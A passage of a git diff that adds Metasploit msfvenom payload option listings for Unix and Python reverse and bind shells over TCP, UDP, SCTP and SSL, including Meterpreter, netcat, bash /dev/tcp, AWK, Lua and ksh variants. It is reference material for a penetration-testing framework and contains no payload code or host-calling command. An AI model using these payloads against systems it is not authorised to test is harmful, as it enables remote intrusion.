secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..39a61ac --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt @@ -0,0 +1,61 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse TCP Inline + Module: payload/cmd/unix/python/meterpreter_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24942 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt new file mode 100644 index 0000000..959642a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt @@ -0,0 +1,32 @@ + + Name: Python Exec, Python Pingback, Bind TCP (via python) + Module: payload/cmd/unix/python/pingback_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 484 + Rank: Normal + +Provided by: + Spencer McIntyre + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Listens for a connection from the attacker, sends a UUID, then terminates + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt new file mode 100644 index 0000000..e5aecf8 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt @@ -0,0 +1,39 @@ + + Name: Python Exec, Python Pingback, Reverse TCP (via python) + Module: payload/cmd/unix/python/pingback_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 421 + Rank: Normal + +Provided by: + Spencer McIntyre + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connects back to the attacker, sends a UUID, then terminates + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt new file mode 100644 index 0000000..c1e6a23 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt @@ -0,0 +1,34 @@ + + Name: Python Exec, Command Shell, Bind TCP (via python) + Module: payload/cmd/unix/python/shell_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 513 + Rank: Normal + +Provided by: + Spencer McIntyre + mumbai + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt new file mode 100644 index 0000000..770f275 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt @@ -0,0 +1,41 @@ + + Name: Python Exec, Command Shell, Reverse SCTP (via python) + Module: payload/cmd/unix/python/shell_reverse_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 550 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt new file mode 100644 index 0000000..514cff0 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt @@ -0,0 +1,41 @@ + + Name: Python Exec, Command Shell, Reverse TCP (via python) + Module: payload/cmd/unix/python/shell_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 493 + Rank: Normal + +Provided by: + Spencer McIntyre + Ben Campbell + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt new file mode 100644 index 0000000..cf700ea --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt @@ -0,0 +1,43 @@ + + Name: Python Exec, Command Shell, Reverse TCP SSL (via python) + Module: payload/cmd/unix/python/shell_reverse_tcp_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 518 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt new file mode 100644 index 0000000..e9b2fdc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt @@ -0,0 +1,40 @@ + + Name: Python Exec, Command Shell, Reverse UDP (via python) + Module: payload/cmd/unix/python/shell_reverse_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 489 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse.txt b/msfvenom/payload_options/cmd-unix-reverse.txt new file mode 100644 index 0000000..350e5aa --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse.txt @@ -0,0 +1,36 @@ + + Name: Unix Command Shell, Double Reverse TCP (telnet) + Module: payload/cmd/unix/reverse + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 100 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ShellPath sh yes The path to the shell to execute + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_awk.txt b/msfvenom/payload_options/cmd-unix-reverse_awk.txt new file mode 100644 index 0000000..34f00c4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_awk.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via AWK) + Module: payload/cmd/unix/reverse_awk + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 139 + Rank: Normal + +Provided by: + espreto + Ulisses Castro + Gabriel Quadros + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via GNU AWK + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash.txt b/msfvenom/payload_options/cmd-unix-reverse_bash.txt new file mode 100644 index 0000000..5a96d3b --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash.txt @@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse TCP (/dev/tcp) + Module: payload/cmd/unix/reverse_bash + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via bash's builtin /dev/tcp. + + This will not work on circa 2009 and older Debian-based Linux + distributions (including Ubuntu) because they compile bash + without the /dev/tcp feature. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt new file mode 100644 index 0000000..fb2fddd --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt @@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse TCP SSL (telnet) + Module: payload/cmd/unix/reverse_bash_telnet_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via mkfifo and telnet. + This method works on Debian and other systems compiled + without /dev/tcp support. This module uses the '-z' + option included on some systems to encrypt using SSL. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt b/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt new file mode 100644 index 0000000..3a2321a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt @@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse UDP (/dev/udp) + Module: payload/cmd/unix/reverse_bash_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 68 + Rank: Normal + +Provided by: + hdm + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via bash's builtin /dev/udp. + + This will not work on circa 2009 and older Debian-based Linux + distributions (including Ubuntu) because they compile bash + without the /dev/udp feature. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_jjs.txt b/msfvenom/payload_options/cmd-unix-reverse_jjs.txt new file mode 100644 index 0000000..60ac5ab --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_jjs.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP (via jjs) + Module: payload/cmd/unix/reverse_jjs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 843 + Rank: Normal + +Provided by: + conerpirate + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute + +Description: + Connect back and create a command shell via jjs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JJSPath jjs yes The path to the JJS executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ksh.txt b/msfvenom/payload_options/cmd-unix-reverse_ksh.txt new file mode 100644 index 0000000..33ec651 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ksh.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via Ksh) + Module: payload/cmd/unix/reverse_ksh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 37 + Rank: Normal + +Provided by: + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ksh. Note: Although Ksh is often + available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KSHPath ksh yes The path to the KSH executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_lua.txt b/msfvenom/payload_options/cmd-unix-reverse_lua.txt new file mode 100644 index 0000000..c9e16f6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_lua.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Lua) + Module: payload/cmd/unix/reverse_lua + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 209 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt new file mode 100644 index 0000000..a1003db --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt @@ -0,0 +1,42 @@ + + Name: Unix Command Shell, Reverse TCP (via ncat) + Module: payload/cmd/unix/reverse_ncat_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 27 + Rank: Normal + +Provided by: + C_Sto + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via ncat, utilizing ssl mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NcatPath ncat yes The path to the NCat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_netcat.txt b/msfvenom/payload_options/cmd-unix-reverse_netcat.txt new file mode 100644 index 0000000..9e6b12a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_netcat.txt @@ -0,0 +1,42 @@ + + Name: Unix Command Shell, Reverse TCP (via netcat) + Module: payload/cmd/unix/reverse_netcat + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + m-1-k-3 + egypt + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + 